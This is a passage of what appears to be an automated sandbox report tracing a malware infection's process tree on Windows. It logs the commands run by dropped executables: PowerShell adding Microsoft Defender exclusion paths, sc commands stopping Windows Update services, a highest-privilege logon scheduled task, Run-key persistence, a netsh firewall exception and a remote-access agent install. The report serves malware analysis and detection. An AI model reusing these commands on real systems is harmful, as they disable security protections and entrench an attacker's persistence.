        C:\Windows\system32\chcp.com
        
        chcp 65001
        62⤵
        
        PID:5884
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        62⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5900
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        62⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:22716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1y8f52ey6ZGH.bat" "
        63⤵
        
        PID:22788
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        64⤵
        
        PID:22836
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        64⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:22852
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        64⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:23172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P4nLSZGM4KxM.bat" "
        65⤵
        
        PID:23260
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        66⤵
        
        PID:23304
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:23320
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        66⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:23452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D7uC9MI2WHAQ.bat" "
        67⤵
        
        PID:5944
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        68⤵
        
        PID:6000
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        68⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6024
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        68⤵
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        
        PID:6404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rCNGkfcM3lV6.bat" "
        69⤵
        
        PID:6588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        70⤵
        
        PID:6676
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        70⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6696
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        70⤵
        Checks computer location settings
        
        PID:6848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qwF7Dz75NJyA.bat" "
        71⤵
        
        PID:6964
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        72⤵
        
        PID:7012
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        72⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7028
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        72⤵
        Checks computer location settings
        
        PID:7464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oGbcffw3GzOZ.bat" "
        73⤵
        
        PID:10248
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        74⤵
        
        PID:10292
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        74⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:10304
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        74⤵
        Checks computer location settings
        
        PID:10424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KptY4m4YaAS3.bat" "
        75⤵
        
        PID:10504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        76⤵
        
        PID:10560
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        76⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:10580
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        76⤵
        Checks computer location settings
        
        PID:10728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0ZpmQBW9Jh4V.bat" "
        77⤵
        
        PID:10820
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        78⤵
        
        PID:10860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        78⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:10880
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        78⤵
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        
        PID:11096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oZHPHAbjnp1j.bat" "
        79⤵
        
        PID:11196
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        80⤵
        
        PID:11252
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        80⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:11276
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        80⤵
        Checks computer location settings
        
        PID:11380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BM6VvjEaK35y.bat" "
        81⤵
        
        PID:11456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        82⤵
        
        PID:11508
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        82⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:11524
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        82⤵
        Checks computer location settings
        
        PID:24600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aBHbXLTWa7cI.bat" "
        83⤵
        
        PID:24676
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        84⤵
        
        PID:24728
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        84⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:24736
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        84⤵
        Checks computer location settings
        
        PID:24876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0Of8lA3dSkH5.bat" "
        85⤵
        
        PID:24940
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        86⤵
        
        PID:24996
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        86⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:25012
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        86⤵
        Checks computer location settings
        
        PID:25160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uuSDO7kn01Yf.bat" "
        87⤵
        
        PID:25248
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        88⤵
        
        PID:25292
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        88⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:25308
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        88⤵
        Checks computer location settings
        
        PID:26344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0vUGwewtfBc0.bat" "
        89⤵
        
        PID:26444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        90⤵
        
        PID:26532
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        90⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:26548
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        90⤵
        Checks computer location settings
        
        PID:26652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugOsCTAgMf9i.bat" "
        91⤵
        
        PID:26724
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        92⤵
        
        PID:26768
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        92⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:26784
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        92⤵
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        
        PID:27148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y7j30y9cAbxR.bat" "
        93⤵
        
        PID:27248
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        94⤵
        
        PID:27300
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        94⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:27316
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        94⤵
        Checks computer location settings
        
        PID:27444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RXAh8OyIRAwa.bat" "
        95⤵
        
        PID:27524
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        96⤵
        
        PID:27576
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        96⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:27592
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        96⤵
        Checks computer location settings
        Suspicious use of SetWindowsHookEx
        
        PID:11892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FgNvDOKZC8vM.bat" "
        97⤵
        
        PID:12168
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        98⤵
        
        PID:12212
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        98⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:12228
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        98⤵
        Checks computer location settings
        
        PID:7720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cXBWUGD5V4jh.bat" "
        99⤵
        
        PID:7792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        100⤵
        
        PID:7840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        100⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7856
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        100⤵
        Checks computer location settings
        
        PID:33328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC4uuYvlVqV0.bat" "
        101⤵
        
        PID:33416
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        102⤵
        
        PID:33464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        102⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:33484
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        102⤵
        Checks computer location settings
        
        PID:34176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Qw2RjR1OKrZT.bat" "
        103⤵
        
        PID:34424
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        104⤵
        
        PID:34548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        104⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:34608
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        104⤵
        Checks computer location settings
        
        PID:35960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1NbqDYjlxVSv.bat" "
        105⤵
        
        PID:36796
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        106⤵
        
        PID:8224
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        106⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8240
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        106⤵
        
        PID:13692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YvzN9glXehyJ.bat" "
        107⤵
        
        PID:14056
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        108⤵
        
        PID:14180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        108⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:14236
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        108⤵
        
        PID:32536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3WYDXrjkdD84.bat" "
        109⤵
        
        PID:31960
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        110⤵
        
        PID:32064
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        110⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:32136
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        110⤵
        
        PID:19752
- - C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\sysppvrdnvs.exe
      C:\Windows\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3240
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:820
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4420
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2216
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:4400
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2992
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:4372
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3320
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4020
    - - C:\Users\Admin\AppData\Local\Temp\99597542.exe
        
        C:\Users\Admin\AppData\Local\Temp\99597542.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:17572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:17624
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:17712
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:17660
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:17732
    - - C:\Users\Admin\AppData\Local\Temp\1657131776.exe
        
        C:\Users\Admin\AppData\Local\Temp\1657131776.exe
        5⤵
        Executes dropped EXE
        
        PID:18312
    - - C:\Users\Admin\AppData\Local\Temp\390324013.exe
        
        C:\Users\Admin\AppData\Local\Temp\390324013.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:19044
    - - C:\Users\Admin\AppData\Local\Temp\2126315482.exe
        
        C:\Users\Admin\AppData\Local\Temp\2126315482.exe
        5⤵
        Executes dropped EXE
        
        PID:19480
    - - C:\Users\Admin\AppData\Local\Temp\810028901.exe
        
        C:\Users\Admin\AppData\Local\Temp\810028901.exe
        5⤵
        
        PID:25068
- - C:\Users\Admin\AppData\Local\Temp\Files\s.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\sysvplervcs.exe
      C:\Windows\sysvplervcs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Executes dropped EXE
      Windows security modification
      Suspicious behavior: SetClipboardViewer
      Suspicious use of WriteProcessMemory
      PID:5096
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4824
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1492
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2084
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2272
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2188
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5068
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3476
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4980
    - - C:\Users\Admin\AppData\Local\Temp\816212898.exe
        
        C:\Users\Admin\AppData\Local\Temp\816212898.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:17876
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:17984
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:18120
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:18024
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:18128
    - - C:\Users\Admin\AppData\Local\Temp\255224367.exe
        
        C:\Users\Admin\AppData\Local\Temp\255224367.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:18380
    - - C:\Users\Admin\AppData\Local\Temp\1074232686.exe
        
        C:\Users\Admin\AppData\Local\Temp\1074232686.exe
        5⤵
        Executes dropped EXE
        
        PID:19096
    - - C:\Users\Admin\AppData\Local\Temp\3362324257.exe
        
        C:\Users\Admin\AppData\Local\Temp\3362324257.exe
        5⤵
        Executes dropped EXE
        
        PID:19648
- - C:\Users\Admin\AppData\Local\Temp\Files\Geek_se.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Geek_se.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:316
- - C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
    3⤵
    - Executes dropped EXE
    PID:39608
  - - C:\Users\Admin\AppData\Local\Temp\is-6SO20.tmp\utility-inst.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-6SO20.tmp\utility-inst.tmp" /SL5="$100268,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:40568
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-I4BCP.tmp\do.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:40732
- - C:\Users\Admin\AppData\Local\Temp\Files\Solara_Protect.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Solara_Protect.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:40692
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:40920
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5D2E.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:40944
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:8592
    - - C:\Users\Admin\AppData\Local\Temp\Windows.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:8632
- - C:\Users\Admin\AppData\Local\Temp\Files\stories.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"
    3⤵
    - Executes dropped EXE
    PID:4044
  - - C:\Users\Admin\AppData\Local\Temp\is-R2P98.tmp\stories.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-R2P98.tmp\stories.tmp" /SL5="$A024A,5532893,721408,C:\Users\Admin\AppData\Local\Temp\Files\stories.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:15436
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause shine-encoder_11152
        5⤵
        
        PID:15720
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause shine-encoder_11152
        6⤵
        
        PID:15820
    - - C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe
        
        "C:\Users\Admin\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:15748
- - C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:6136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1228
      4⤵
      Program crash
      PID:7104
- - C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe"
    3⤵
    - Adds Run key to start application
    PID:2472
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe
      4⤵
      Modifies registry class
      PID:23556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:23608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:24204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Pause
        5⤵
        
        PID:24224
- - C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:23712
  - - C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
      "C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
      4⤵
      Sets service image path in registry
      Drops file in Program Files directory
      PID:23784
- - C:\Users\Admin\AppData\Local\Temp\Files\dayum.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\dayum.exe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:23764
  - - C:\Users\Admin\AppData\Local\Temp\server.exe
      "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Drops startup file
      Adds Run key to start application
      PID:6504
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:10172
- - C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
    3⤵
    - Suspicious use of SetThreadContext
